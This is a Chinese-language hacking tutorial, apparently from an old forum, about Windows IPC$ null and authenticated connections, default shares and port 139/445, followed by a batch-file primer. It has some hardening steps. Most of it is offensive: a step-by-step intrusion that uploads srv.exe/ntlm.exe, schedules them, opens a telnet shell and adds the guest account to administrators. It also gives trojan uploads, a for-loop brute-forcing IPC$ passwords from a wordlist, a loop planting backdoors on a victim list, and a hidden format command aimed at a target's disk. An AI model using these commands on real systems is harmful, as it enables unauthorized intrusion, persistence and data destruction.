所以我認(rèn)為,你不要把ipc$入侵當(dāng)作終極武器,不要認(rèn)為它戰(zhàn)無不勝,它就像是足球場(chǎng)上射門前的傳球,很少會(huì)有致命一擊的效果,但卻是不可缺少的,我覺得這才是ipc$連接在hack入侵中的意義所在.

?

四 ipc$與空連接,139,445端口,默認(rèn)共享的關(guān)系
以上四者的關(guān)系可能是菜鳥很困惑的一個(gè)問題,不過大部分文章都沒有進(jìn)行特別的說明,其實(shí)我理解的也不是很透徹,都是在與大家交流中總結(jié)出來的.(一個(gè)有良好討論氛圍的BBS可以說是菜鳥的天堂)

?

1)ipc$與空連接:
不需要用戶名與密碼的ipc$連接即為空連接,一旦你以某個(gè)用戶或管理員的身份登陸(即以特定的用戶名和密碼進(jìn)行ipc$連接),自然就不能叫做空連接了.
許 多人可能要問了,既然可以空連接,那我以后就空連接好了,為什么還要費(fèi)九牛二虎之力去掃描弱口令,呵呵,原因前面提到過,當(dāng)你以空連接登陸時(shí),你沒有任何 權(quán)限(很郁悶吧),而你以用戶或管理員的身份登陸時(shí),你就會(huì)有相應(yīng)的權(quán)限(有權(quán)限誰不想呀,所以還是老老實(shí)實(shí)掃吧,不要偷懶喲).
2)ipc$與139,445端口:
ipc$連接可以實(shí)現(xiàn)遠(yuǎn)程登陸及對(duì)默認(rèn)共享的訪問;而139端口的開啟表示netbios協(xié)議的應(yīng)用,我們可以通過139,445(win2000)端口實(shí)現(xiàn)對(duì)共享文件/打印機(jī)的訪問,因此一般來講,ipc$連接是需要139或445端口來支持的.
3)ipc$與默認(rèn)共享
默認(rèn)共享是為了方便管理員遠(yuǎn)程管理而默認(rèn)開啟的共享(你當(dāng)然可以關(guān)閉它),即所有的邏輯盤(c$,d$,e$……)和系統(tǒng)目錄winnt或windows(admin$),我們通過ipc$連接可以實(shí)現(xiàn)對(duì)這些默認(rèn)共享的訪問(前提是對(duì)方?jīng)]有關(guān)閉這些默認(rèn)共享)

?

五 ipc$連接失敗的原因
以下5個(gè)原因是比較常見的:
1)你的系統(tǒng)不是NT或以上操作系統(tǒng);
2)對(duì)方?jīng)]有打開ipc$默認(rèn)共享
3)對(duì)方未開啟139或445端口(惑被防火墻屏蔽)
4)你的命令輸入有誤(比如缺少了空格等)
5)用戶名或密碼錯(cuò)誤(空連接當(dāng)然無所謂了)
另外,你也可以根據(jù)返回的錯(cuò)誤號(hào)分析原因：
錯(cuò)誤號(hào)5，拒絕訪問 ： 很可能你使用的用戶不是管理員權(quán)限的，先提升權(quán)限；
錯(cuò)誤號(hào)51，Windows 無法找到網(wǎng)絡(luò)路徑 : 網(wǎng)絡(luò)有問題；
錯(cuò)誤號(hào)53，找不到網(wǎng)絡(luò)路徑 ： ip地址錯(cuò)誤；目標(biāo)未開機(jī)；目標(biāo)lanmanserver服務(wù)未啟動(dòng)；目標(biāo)有防火墻（端口過濾）；
錯(cuò)誤號(hào)67，找不到網(wǎng)絡(luò)名 ： 你的lanmanworkstation服務(wù)未啟動(dòng)；目標(biāo)刪除了ipc$；
錯(cuò)誤號(hào)1219，提供的憑據(jù)與已存在的憑據(jù)集沖突 ： 你已經(jīng)和對(duì)方建立了一個(gè)ipc$，請(qǐng)刪除再連。
錯(cuò)誤號(hào)1326，未知的用戶名或錯(cuò)誤密碼 ： 原因很明顯了；
錯(cuò)誤號(hào)1792，試圖登錄，但是網(wǎng)絡(luò)登錄服務(wù)沒有啟動(dòng) ： 目標(biāo)NetLogon服務(wù)未啟動(dòng)。（連接域控會(huì)出現(xiàn)此情況）
錯(cuò)誤號(hào)2242，此用戶的密碼已經(jīng)過期 ： 目標(biāo)有帳號(hào)策略，強(qiáng)制定期要求更改密碼。
關(guān)于ipc$連不上的問題比較復(fù)雜，除了以上的原因,還會(huì)有其他一些不確定因素,在此本人無法詳細(xì)而確定的說明,就靠大家自己體會(huì)和試驗(yàn)了.

?

六 如何打開目標(biāo)的IPC$(此段引自相關(guān)文章)
首 先你需要獲得一個(gè)不依賴于ipc$的shell，比如sql的cmd擴(kuò)展、telnet、木馬,當(dāng)然，這shell必須是admin權(quán)限的,然后你可以使 用shell執(zhí)行命令 net share ipc$ 來開放目標(biāo)的ipc$。從上面可以知道，ipc$能否使用還有很多條件。請(qǐng)確認(rèn)相關(guān)服務(wù)都已運(yùn)行，沒有就啟動(dòng)它（不知道怎么做的請(qǐng)看net命令的用法）, 還是不行的話（比如有防火墻，殺不了）建議放棄。

?

七 如何防范ipc$入侵
1禁止空連接進(jìn)行枚舉(此操作并不能阻止空連接的建立,引自《解剖win2000下的空會(huì)話》)
首 先運(yùn)行regedit，找到如下組建[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\ LSA]把RestrictAnonymous = DWORD的鍵值改為：00000001(如果設(shè)置為2的話,有一些問題會(huì)發(fā)生,比如一些WIN的服務(wù)出現(xiàn)問題等等)

?

2禁止默認(rèn)共享
1）察看本地共享資源
運(yùn)行-cmd-輸入net share
2）刪除共享(每次輸入一個(gè)）
net share ipc$ /delete
net share admin$ /delete
net share c$ /delete
net share d$ /delete（如果有e,f,……可以繼續(xù)刪除）
3）停止server服務(wù)
net stop server /y （重新啟動(dòng)后server服務(wù)會(huì)重新開啟）
4）修改注冊(cè)表
運(yùn)行-regedit
server 版:找到如下主鍵[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\ LanmanServer\Parameters]把AutoShareServer（DWORD）的鍵值改為:00000000。
pro版:找到如下主鍵[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters]把AutoShareWks（DWORD）的鍵值改為:00000000。
如果上面所說的主鍵不存在，就新建(右擊-新建-雙字節(jié)值）一個(gè)主健再改鍵值。

?

3永久關(guān)閉ipc$和默認(rèn)共享依賴的服務(wù):lanmanserver即server服務(wù)
控制面板-管理工具-服務(wù)-找到server服務(wù)（右擊）-屬性-常規(guī)-啟動(dòng)類型-已禁用

?

4安裝防火墻(選中相關(guān)設(shè)置)，或者端口過濾(濾掉139,445等),或者用新版本的優(yōu)化大師

?

5設(shè)置復(fù)雜密碼，防止通過ipc$窮舉密碼

?

八 相關(guān)命令
1)建立空連接:
net use \\IP\ipc$ "" /user:"" (一定要注意:這一行命令中包含了3個(gè)空格)

?

2)建立非空連接:
net use \\IP\ipc$ "用戶名" /user:"密碼" (同樣有3個(gè)空格)

?

3)映射默認(rèn)共享:
net use z: \\IP\c$ "密碼" /user:"用戶名" (即可將對(duì)方的c盤映射為自己的z盤，其他盤類推)
如果已經(jīng)和目標(biāo)建立了ipc$，則可以直接用IP+盤符+$訪問,具體命令 net use z: \\IP\c$

?

4)刪除一個(gè)ipc$連接
net use \\IP\ipc$ /del

?

5)刪除共享映射
net use c: /del 刪除映射的c盤，其他盤類推
net use * /del 刪除全部,會(huì)有提示要求按y確認(rèn)

?

九 經(jīng)典入侵模式
這個(gè)入侵模式太經(jīng)典了,大部分ipc教程都有介紹,我也就拿過來引用了,在此感謝原創(chuàng)作者!(不知道是哪位前輩)

?

11. C:\>net use \\127.0.0.1\IPC$ "密碼" /user:"用戶名"
一般用流光，通過掃描弱口令來得到，管理員帳號(hào)和密碼.
2. C:\>copy srv.exe \\127.0.0.1\admin$
先復(fù)制srv.exe上去，在流光的Tools目錄下就有（這里的$是指admin用戶的c:\winnt\system32\，大家還可以使用c$、d$，意思是C盤與D盤，這看你要復(fù)制到什么地方去了）。
　　
3. C:\>net time \\127.0.0.1
查查時(shí)間，發(fā)現(xiàn)127.0.0.1 的當(dāng)前時(shí)間是 2004/6/15 上午 11:00，命令成功完成。
　　
4. C:\>at \\127.0.0.1 11:05 srv.exe
用at命令啟動(dòng)srv.exe吧

?

5. C:\>net time \\127.0.0.1
再查查到時(shí)間沒有？如果127.0.0.1 的當(dāng)前時(shí)間是 2004/6/15 上午 11:05，那就準(zhǔn)備開始下面的命令。
　　
6. C:\>telnet 127.0.0.1 99
這里會(huì)用到Telnet命令吧，注意端口是99。Telnet默認(rèn)的是23端口，但是我們使用的是SRV在對(duì)方計(jì)算機(jī)中為我們建立一個(gè)99端口的Shell。
雖然我們可以Telnet上去了，但是SRV是一次性的，下次登錄還要再激活！所以我們打算建立一個(gè)Telnet服務(wù)！這就要用到ntlm了
　　
7.C:\>copy ntlm.exe \\127.0.0.1\admin$
用Copy命令把ntlm.exe上傳到主機(jī)上（ntlm.exe也是在《流光》的Tools目錄中）。
　　
8. C:\WINNT\system32>ntlm
輸入ntlm啟動(dòng)（這里的C:\WINNT\system32>指的是對(duì)方計(jì)算機(jī)，運(yùn)行ntlm其實(shí)是讓這個(gè)程序在對(duì)方計(jì)算機(jī)上運(yùn)行）。當(dāng)出現(xiàn)"DONE"的時(shí)候，就說明已經(jīng)啟動(dòng)正常。然后使用"net start telnet"來開啟Telnet服務(wù)！

?

9. Telnet 127.0.0.1，接著輸入用戶名與密碼就進(jìn)入對(duì)方了，操作就像在DOS上操作一樣簡單！(然后你想做什么?想做什么就做什么吧,哈哈)

?

為了以防萬一,我們?cè)侔裧uest激活加到管理組
10. C:\>net user guest /active:yes
將對(duì)方的Guest用戶激活

?

11. C:\>net user guest 1234
將Guest的密碼改為1234,或者你要設(shè)定的密碼

?

12. C:\>net localgroup administrators guest /add
將Guest變?yōu)锳dministrator(如果管理員密碼更改，guest帳號(hào)沒改變的話，下次我們可以用guest再次訪問這臺(tái)計(jì)算機(jī))

ipc$常見問題:

?

1，怎樣建立空連接，它有什么用？
答：使用命令 net use \IPipc$ "" /user:"" 就可以簡單地和目標(biāo)建立一個(gè)空連接（需要目標(biāo)開放ipc$）。
對(duì)于NT，在默認(rèn)安全設(shè)置下，借助空連接可以列舉目標(biāo)用戶、共享，訪問everyone權(quán)限的共享，訪問小部分注冊(cè)表等，沒有什么利用價(jià)值。對(duì)2000作用就更小了。而且實(shí)現(xiàn)也不方便，需借助工具。

?

2.為什么我連不上IPC$？
答：1.只有nt/2000/xp及以上系統(tǒng)才可以建立ipc$。如果你用的是98/me是沒有該功能的。
2.確認(rèn)你的命令沒有打錯(cuò)。正確的命令是： net use \目標(biāo)IPipc$ "密碼" /user:"用戶名"
注意別多了或少了空格。當(dāng)用戶名和密碼中不包含空格時(shí)兩邊的雙引號(hào)可以省略。空密碼用""表示。

?

3，根據(jù)返回的錯(cuò)誤號(hào)分析原因：
錯(cuò)誤號(hào)5，拒絕訪問 ： 很可能你使用的用戶不是管理員權(quán)限的，先提升權(quán)限；
錯(cuò)誤號(hào)51，Windows 無法找到網(wǎng)絡(luò)路徑 : 網(wǎng)絡(luò)有問題；
錯(cuò)誤號(hào)53，找不到網(wǎng)絡(luò)路徑 ： ip地址錯(cuò)誤；目標(biāo)未開機(jī)；目標(biāo)lanmanserver服務(wù)未啟動(dòng)；目標(biāo)有防火墻（端口過濾）；
錯(cuò)誤號(hào)67，找不到網(wǎng)絡(luò)名 ： 你的lanmanworkstation服務(wù)未啟動(dòng)；目標(biāo)刪除了ipc$；
錯(cuò)誤號(hào)1219，提供的憑據(jù)與已存在的憑據(jù)集沖突 ： 你已經(jīng)和對(duì)方建立了一個(gè)ipc$，請(qǐng)刪除再連。
錯(cuò)誤號(hào)1326，未知的用戶名或錯(cuò)誤密碼 ： 原因很明顯了；
錯(cuò)誤號(hào)1792，試圖登錄，但是網(wǎng)絡(luò)登錄服務(wù)沒有啟動(dòng) ： 目標(biāo)NetLogon服務(wù)未啟動(dòng)。（連接域控會(huì)出現(xiàn)此情況）
錯(cuò)誤號(hào)2242，此用戶的密碼已經(jīng)過期 ： 目標(biāo)有帳號(hào)策略，強(qiáng)制定期要求更改密碼。

?

4，關(guān)于ipc$連不上的問題比較復(fù)雜，沒有總結(jié)出一個(gè)統(tǒng)一的認(rèn)識(shí)，在肉雞上實(shí)驗(yàn)有時(shí)會(huì)得出矛盾的結(jié)論，十分棘手。 而且知道了問題所在，如果沒有用其他辦法獲得shell，很多問題依然不能解決。

?

5，怎樣打開目標(biāo)的IPC$？
答： 首先你需要獲得一個(gè)不依賴于ipc$的shell，比如sql的cmd擴(kuò)展、telnet、木馬。當(dāng)然，這shell必須是admin權(quán)限的。然后你可以 使用shell執(zhí)行命令 net share ipc$ 來開放目標(biāo)的ipc$。從上一問題可以知道，ipc$能否使用還有很多條件。請(qǐng)確認(rèn)相關(guān)服務(wù)都已運(yùn)行，沒有就啟動(dòng)它（不知道怎么做的請(qǐng)看net命令的用 法）。還是不行的話（比如有防火墻，殺不了）建議放棄。

?

6，怎樣映射和訪問默認(rèn)共享？
答：使用命令 net use z: \目標(biāo)IPc$ "密碼" /user:"用戶名" 將對(duì)方的c盤映射為自己的z盤，其他盤類推。
如 果已經(jīng)和目標(biāo)建立了ipc$，則可以直接用IP加盤符加$訪問。比如 copy muma.exe \IPd$pathmuma.exe 。或者再映射也可以，只是不用用戶名和密碼了：net use y: \IPd$ 。然后 copy muma.exe y:pathmuma.exe 。當(dāng)路徑中包含空格時(shí)，須用""將路徑全引住。

?

7，如何刪除映射和ipc$連接？
答：用命令 net use \IPipc$ /del 刪除和一個(gè)目標(biāo)的ipc$連接。
用命令 net use z: /del 刪除映射的z盤，其他盤類推。
用命令 net use * /del 刪除全部。會(huì)有提示要求按y確認(rèn)。

?

8，連上ipc$然后我能做什么？
答： 能使用管理員權(quán)限的帳號(hào)成功和目標(biāo)連接ipc$，表示你可以和對(duì)方系統(tǒng)做深入“交流”了。你可以使用各種命令行方式的工具（比如pstools系列、 Win2000SrvReskit、telnethack等）獲得目標(biāo)信息、管理目標(biāo)的進(jìn)程和服務(wù)等。如果目標(biāo)開放了默認(rèn)共享（沒開你就幫他開），你就可 以上傳木馬并運(yùn)行。也可以用tftp、ftp的辦法上傳。像dwrcc、VNC、RemoteAdmin等工具（木馬）還具有直接控屏的功能。如果是 2000server，還可以考慮開啟終端服務(wù)方便控制。這里提到的工具的使用，請(qǐng)看自帶的說明或相關(guān)教程。

?

9，怎樣防止別人用ips$和默認(rèn)共享入侵我？
答：A、一種辦法是把ipc$和默認(rèn)共享都刪除了。但重起后還會(huì)有。這就需要改注冊(cè)表。
1，先把已有的刪除
net share ipc$ /del
net share admin$ /del
net share c$ /del
…………（有幾個(gè)刪幾個(gè)）
2，禁止別人空連接
　　 　　 首先運(yùn)行regedit，找到如下主鍵[HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlLSA]把RestrictAnonymous（DWORD）的鍵值改為：00000002。
　　 　 3，禁止自動(dòng)打開默認(rèn)共享
　 　 　　 對(duì)于server版，找到如下主鍵 [HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesLanmanServerParameters] 把AutoShareServer（DWORD）的鍵值改為:00000000。
對(duì)于pro版，則是[HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesLanmanServerParameters]把AutoShareWks（DWORD）的鍵值改為:00000000。
如果上面所說的主鍵不存在，就新建一個(gè)再改鍵值。
B、另一種是關(guān)閉ipc$和默認(rèn)共享依賴的服務(wù)（不推薦）
net stop lanmanserver
可能會(huì)有提示說，XXX服務(wù)也會(huì)關(guān)閉是否繼續(xù)。因?yàn)檫€有些次要的服務(wù)依賴于lanmanserver。一般情況按y繼續(xù)就可以了。
C、最簡單的辦法是設(shè)置復(fù)雜密碼，防止通過ipc$窮舉密碼。但如果你有其他漏洞，ipc$將為進(jìn)一步入侵提供方便。
D、還有一個(gè)辦法就是裝防火墻，或者端口過濾。
簡明批處理教程:

?

批處理命令如果運(yùn)用得當(dāng)，威力強(qiáng)大無人能敵!是不是想學(xué)習(xí)了呢，從今天我將把批處理的常用命令陸續(xù)的介紹給大家，如果大家有什么不懂的地方，可以寫下評(píng)論:

?

批處理文件是無格式的文本文件，它包含一條或多條命令。它的文件擴(kuò)展名為 .bat 或 .cmd。在命令提示下鍵入批處理文件的名稱，或者雙擊該批處理文件，系統(tǒng)就會(huì)調(diào)用Cmd.exe按照該文件中各個(gè)命令出現(xiàn)的順序來逐個(gè)運(yùn)行它們。
一.簡單批處理內(nèi)部命令簡介
1.Echo 命令
打開回顯或關(guān)閉請(qǐng)求回顯功能，或顯示消息。如果沒有任何參數(shù)，echo 命令將顯示當(dāng)前回顯設(shè)置。
語法
echo [{on　off}] [message]
Sample：@echo off / echo hello world
在實(shí)際應(yīng)用中我們會(huì)把這條命令和重定向符號(hào)（也稱為管道符號(hào)，一般用> >> ）結(jié)合來實(shí)現(xiàn)輸入一些命令到特定格式的文件中.這將在以后的例子中體現(xiàn)出來。

?

2.@ 命令
表示不顯示@后面的命令，在入侵過程中（例如使用批處理來格式化敵人的硬盤）自然不能讓對(duì)方看到你使用的命令啦。
Sample：@echo off
@echo Now initializing the program,please wait a minite...
@format X: /q/u/autoset (format 這個(gè)命令是不可以使用/y這個(gè)參數(shù)的，可喜的是微軟留了個(gè)autoset這個(gè)參數(shù)給我們，效果和/y是一樣的。)

?

3.Goto 命令
指定跳轉(zhuǎn)到標(biāo)簽，找到標(biāo)簽后，程序?qū)⑻幚韽南乱恍虚_始的命令。
語法：goto label （label是參數(shù)，指定所要轉(zhuǎn)向的批處理程序中的行。）
Sample：
if {%1}=={} goto noparms
if {%2}=={} goto noparms（如果這里的if、%1、%2你不明白的話，先跳過去，后面會(huì)有詳細(xì)的解釋。）
@Rem check parameters if null show usage
:noparms
echo Usage: monitor.bat ServerIP PortNumber
goto end
標(biāo)簽的名字可以隨便起，但是最好是有意義的字母啦，字母前加個(gè)：用來表示這個(gè)字母是標(biāo)簽，goto命令就是根據(jù)這個(gè)：來尋找下一步跳到到那里。最好有一些說明這樣你別人看起來才會(huì)理解你的意圖啊。

?

4.Rem 命令
注釋命令，在C語言中相當(dāng)與/*--------*/,它并不會(huì)被執(zhí)行，只是起一個(gè)注釋的作用，便于別人閱讀和你自己日后修改。
Rem Message
Sample：@Rem Here is the description.
5.Pause 命令
運(yùn)行 Pause 命令時(shí)，將顯示下面的消息：
Press any key to continue . . .
Sample：
@echo off
:begin
copy a:*.* d：\back
echo Please put a new disk into driver A
pause
goto begin
在這個(gè)例子中，驅(qū)動(dòng)器 A 中磁盤上的所有文件均復(fù)制到d:\back中。顯示的注釋提示您將另一張磁盤放入驅(qū)動(dòng)器 A 時(shí)，pause 命令會(huì)使程序掛起，以便您更換磁盤，然后按任意鍵繼續(xù)處理。

?

6.Call 命令
從一個(gè)批處理程序調(diào)用另一個(gè)批處理程序，并且不終止父批處理程序。call 命令接受用作調(diào)用目標(biāo)的標(biāo)簽。如果在腳本或批處理文件外使用 Call，它將不會(huì)在命令行起作用。
語法
call [[Drive:][Path] FileName [BatchParameters]] [:label [arguments]]
參數(shù)
[Drive:}[Path] FileName
指定要調(diào)用的批處理程序的位置和名稱。filename 參數(shù)必須具有 .bat 或 .cmd 擴(kuò)展名。

?

7.start 命令
調(diào)用外部程序，所有的DOS命令和命令行程序都可以由start命令來調(diào)用。
入侵常用參數(shù)：
MIN 開始時(shí)窗口最小化
SEPARATE 在分開的空間內(nèi)開始 16 位 Windows 程序
HIGH 在 HIGH 優(yōu)先級(jí)類別開始應(yīng)用程序
REALTIME 在 REALTIME 優(yōu)先級(jí)類別開始應(yīng)用程序
WAIT 啟動(dòng)應(yīng)用程序并等候它結(jié)束
parameters 這些為傳送到命令/程序的參數(shù)
執(zhí)行的應(yīng)用程序是 32-位 GUI 應(yīng)用程序時(shí)，CMD.EXE 不等應(yīng)用程序終止就返回命令提示。如果在命令腳本內(nèi)執(zhí)行，該新行為則不會(huì)發(fā)生。
8.choice 命令
choice 使用此命令可以讓用戶輸入一個(gè)字符，從而運(yùn)行不同的命令。使用時(shí)應(yīng)該加/c:參數(shù)，c:后應(yīng)寫提示可輸入的字符，之間無空格。它的返回碼為1234……
如: choice /c:dme defrag,mem,end
將顯示
defrag,mem,end[D,M,E]?
Sample：
Sample.bat的內(nèi)容如下:
@echo off
choice /c:dme defrag,mem,end
if errorlevel 3 goto defrag （應(yīng)先判斷數(shù)值最高的錯(cuò)誤碼）
if errorlevel 2 goto mem
if errotlevel 1 goto end

?

:defrag
c:\dos\defrag
goto end
:mem
mem
goto end
:end
echo good bye

?

此 文件運(yùn)行后，將顯示 defrag,mem,end[D,M,E]? 用戶可選擇d m e ，然后if語句將作出判斷，d表示執(zhí)行標(biāo)號(hào)為defrag的程序段，m表示執(zhí)行標(biāo)號(hào)為mem的程序段，e表示執(zhí)行標(biāo)號(hào)為end的程序段，每個(gè)程序段最后都 以goto end將程序跳到end標(biāo)號(hào)處，然后程序?qū)@示good bye，文件結(jié)束。
9.If 命令

?

if 表示將判斷是否符合規(guī)定的條件，從而決定執(zhí)行不同的命令。 有三種格式:
1、if "參數(shù)" == "字符串" 　待執(zhí)行的命令
參數(shù)如果等于指定的字符串，則條件成立，運(yùn)行命令，否則運(yùn)行下一句。(注意是兩個(gè)等號(hào)）
如if "%1"=="a" format a:
if {%1}=={} goto noparms
if {%2}=={} goto noparms

?

2、if exist 文件名　 待執(zhí)行的命令
如果有指定的文件，則條件成立，運(yùn)行命令，否則運(yùn)行下一句。
如if exist config.sys edit config.sys

?

3、if errorlevel / if not errorlevel 數(shù)字　 待執(zhí)行的命令
如果返回碼等于指定的數(shù)字，則條件成立，運(yùn)行命令，否則運(yùn)行下一句。
如if errorlevel 2 goto x2 　
DOS程序運(yùn)行時(shí)都會(huì)返回一個(gè)數(shù)字給DOS，稱為錯(cuò)誤碼errorlevel或稱返回碼，常見的返回碼為0、1。

?

10.for 命令
for 命令是一個(gè)比較復(fù)雜的命令，主要用于參數(shù)在指定的范圍內(nèi)循環(huán)執(zhí)行命令。
在批處理文件中使用 FOR 命令時(shí)，指定變量請(qǐng)使用 %%variable

?

for {%variable|%%variable} in (set) do command [ CommandLineOptions]
%variable 指定一個(gè)單一字母可替換的參數(shù)。
(set) 指定一個(gè)或一組文件。可以使用通配符。
command 指定對(duì)每個(gè)文件執(zhí)行的命令。
command-parameters 為特定命令指定參數(shù)或命令行開關(guān)。
在批處理文件中使用 FOR 命令時(shí)，指定變量請(qǐng)使用 %%variable
而不要用 %variable。變量名稱是區(qū)分大小寫的，所以 %i 不同于 %I

?

如果命令擴(kuò)展名被啟用，下列額外的 FOR 命令格式會(huì)受到
支持:

?

FOR /D %variable IN (set) DO command [command-parameters]

?

如果集中包含通配符，則指定與目錄名匹配，而不與文件
名匹配。

?

FOR /R [[drive:]path] %variable IN (set) DO command [command-

?

檢查以 [drive:]path 為根的目錄樹，指向每個(gè)目錄中的
FOR 語句。如果在 /R 后沒有指定目錄，則使用當(dāng)前
目錄。如果集僅為一個(gè)單點(diǎn)(.)字符，則枚舉該目錄樹。

?

FOR /L %variable IN (start,step,end) DO command [command-para

?

該集表示以增量形式從開始到結(jié)束的一個(gè)數(shù)字序列。
因此，(1,1,5) 將產(chǎn)生序列 1 2 3 4 5，(5,-1,1) 將產(chǎn)生
序列 (5 4 3 2 1)。

?

FOR /F ["options"] %variable IN (file-set) DO command
FOR /F ["options"] %variable IN ("string") DO command
FOR /F ["options"] %variable IN ('command') DO command

?

或者，如果有 usebackq 選項(xiàng):

?

FOR /F ["options"] %variable IN (file-set) DO command
FOR /F ["options"] %variable IN ("string") DO command
FOR /F ["options"] %variable IN ('command') DO command

?

filenameset 為一個(gè)或多個(gè)文件名。繼續(xù)到 filenameset 中的
下一個(gè)文件之前，每份文件都已被打開、讀取并經(jīng)過處理。
處理包括讀取文件，將其分成一行行的文字，然后將每行
解析成零或更多的符號(hào)。然后用已找到的符號(hào)字符串變量值
調(diào)用 For 循環(huán)。以默認(rèn)方式，/F 通過每個(gè)文件的每一行中分開
的第一個(gè)空白符號(hào)。跳過空白行。您可通過指定可選 "options"
參數(shù)替代默認(rèn)解析操作。這個(gè)帶引號(hào)的字符串包括一個(gè)或多個(gè)
指定不同解析選項(xiàng)的關(guān)鍵字。這些關(guān)鍵字為:

?

eol=c - 指一個(gè)行注釋字符的結(jié)尾(就一個(gè))
skip=n - 指在文件開始時(shí)忽略的行數(shù)。
delims=xxx - 指分隔符集。這個(gè)替換了空格和跳格鍵的
默認(rèn)分隔符集。
tokens=x,y,m-n - 指每行的哪一個(gè)符號(hào)被傳遞到每個(gè)迭代
的 for 本身。這會(huì)導(dǎo)致額外變量名稱的
格式為一個(gè)范圍。通過 nth 符號(hào)指定 m
符號(hào)字符串中的最后一個(gè)字符星號(hào)，
那么額外的變量將在最后一個(gè)符號(hào)解析之
分配并接受行的保留文本。
usebackq - 指定新語法已在下類情況中使用:
在作為命令執(zhí)行一個(gè)后引號(hào)的字符串并且
引號(hào)字符為文字字符串命令并允許在 fi
中使用雙引號(hào)擴(kuò)起文件名稱。

?

sample1:
FOR /F "eol=;;; tokens=2,3* delims=, " %i in (myfile.txt) do command

?

會(huì)分析 myfile.txt 中的每一行，忽略以分號(hào)打頭的那些行，將
每行中的第二個(gè)和第三個(gè)符號(hào)傳遞給 for 程序體；用逗號(hào)和/或
空格定界符號(hào)。請(qǐng)注意，這個(gè) for 程序體的語句引用 %i 來
取得第二個(gè)符號(hào)，引用 %j 來取得第三個(gè)符號(hào)，引用 %k
來取得第三個(gè)符號(hào)后的所有剩余符號(hào)。對(duì)于帶有空格的文件
名，您需要用雙引號(hào)將文件名括起來。為了用這種方式來使
用雙引號(hào)，您還需要使用 usebackq 選項(xiàng)，否則，雙引號(hào)會(huì)
被理解成是用作定義某個(gè)要分析的字符串的。

?

%i 專門在 for 語句中得到說明，%j 和 %k 是通過
tokens= 選項(xiàng)專門得到說明的。您可以通過 tokens= 一行
指定最多 26 個(gè)符號(hào)，只要不試圖說明一個(gè)高于字母 'z' 或
'Z' 的變量。請(qǐng)記住，FOR 變量是單一字母、分大小寫和全局的；
同時(shí)不能有 52 個(gè)以上都在使用中。

?

您還可以在相鄰字符串上使用 FOR /F 分析邏輯；方法是，
用單引號(hào)將括號(hào)之間的 filenameset 括起來。這樣，該字符
串會(huì)被當(dāng)作一個(gè)文件中的一個(gè)單一輸入行。

?

最后，您可以用 FOR /F 命令來分析命令的輸出。方法是，將
括號(hào)之間的 filenameset 變成一個(gè)反括字符串。該字符串會(huì)
被當(dāng)作命令行，傳遞到一個(gè)子 CMD.EXE，其輸出會(huì)被抓進(jìn)
內(nèi)存，并被當(dāng)作文件分析。因此，以下例子:

?

FOR /F "usebackq delims==" %i IN (`set`) DO @echo %i

?

會(huì)枚舉當(dāng)前環(huán)境中的環(huán)境變量名稱。

?

另外，FOR 變量參照的替換已被增強(qiáng)。您現(xiàn)在可以使用下列
選項(xiàng)語法:

?

~I - 刪除任何引號(hào)(")，擴(kuò)充 %I
%~fI - 將 %I 擴(kuò)充到一個(gè)完全合格的路徑名
%~dI - 僅將 %I 擴(kuò)充到一個(gè)驅(qū)動(dòng)器號(hào)
%~pI - 僅將 %I 擴(kuò)充到一個(gè)路徑
%~nI - 僅將 %I 擴(kuò)充到一個(gè)文件名
%~xI - 僅將 %I 擴(kuò)充到一個(gè)文件擴(kuò)展名
%~sI - 擴(kuò)充的路徑只含有短名
%~aI - 將 %I 擴(kuò)充到文件的文件屬性
%~tI - 將 %I 擴(kuò)充到文件的日期/時(shí)間
%~zI - 將 %I 擴(kuò)充到文件的大小
%~$PATH:I - 查找列在路徑環(huán)境變量的目錄，并將 %I 擴(kuò)充
到找到的第一個(gè)完全合格的名稱。如果環(huán)境變量
未被定義，或者沒有找到文件，此組合鍵會(huì)擴(kuò)充
空字符串

?

可以組合修飾符來得到多重結(jié)果:

?

%~dpI - 僅將 %I 擴(kuò)充到一個(gè)驅(qū)動(dòng)器號(hào)和路徑
%~nxI - 僅將 %I 擴(kuò)充到一個(gè)文件名和擴(kuò)展名
%~fsI - 僅將 %I 擴(kuò)充到一個(gè)帶有短名的完整路徑名
%~dp$PATH:i - 查找列在路徑環(huán)境變量的目錄，并將 %I 擴(kuò)充
到找到的第一個(gè)驅(qū)動(dòng)器號(hào)和路徑。
%~ftzaI - 將 %I 擴(kuò)充到類似輸出線路的 DIR

?

在以上例子中，%I 和 PATH 可用其他有效數(shù)值代替。%~ 語法
用一個(gè)有效的 FOR 變量名終止。選取類似 %I 的大寫變量名
比較易讀，而且避免與不分大小寫的組合鍵混淆。

?

以上是MS的官方幫助，下面我們舉幾個(gè)例子來具體說明一下For命令在入侵中的用途。

?

sample2：

?

利用For命令來實(shí)現(xiàn)對(duì)一臺(tái)目標(biāo)Win2k主機(jī)的暴力密碼破解。
我們用net use \\ip\ipc$ "password" /u:"administrator"來嘗試這和目標(biāo)主機(jī)進(jìn)行連接，當(dāng)成功時(shí)記下密碼。
最主要的命令是一條：for /f i% in (dict.txt) do net use \\ip\ipc$ "i%"
/u:"administrator"
用i%來表示admin的密碼，在dict.txt中這個(gè)取i%的值用net use 命令來連接。然后將程序運(yùn)行結(jié)果傳遞給find命令－－
for /f i%% in (dict.txt) do net use \\ip\ipc$ "i%%"
/u:"administrator"|find ":命令成功完成">>D:\ok.txt ，這樣就ko了。

?

sample3：

?

你有沒有過手里有大量肉雞等著你去種后門＋木馬呢？，當(dāng)數(shù)量特別多的時(shí)候，原本很開心的一件事都會(huì)變得很郁悶：）。文章開頭就談到使用批處理文件，可以簡化日常或重復(fù)性任務(wù)。那么如何實(shí)現(xiàn)呢？呵呵，看下去你就會(huì)明白了。

?

主要命令也只有一條：（在批處理文件中使用 FOR 命令時(shí)，指定變量使用 %%variable）
@for /f "tokens=1,2,3 delims= " %%i in (victim.txt) do start call door.bat
%%i %%j %%k
tokens的用法請(qǐng)參見上面的sample1，在這里它表示按順序?qū)ictim.txt中的內(nèi)容傳遞給door.bat中的參數(shù)%i %j %k。
而cultivate.bat無非就是用net use命令來建立IPC$連接，并copy木馬＋后門到victim，然后用返回碼（If
errorlever =）來篩選成功種植后門的主機(jī)，并echo出來，或者echo到指定的文件。
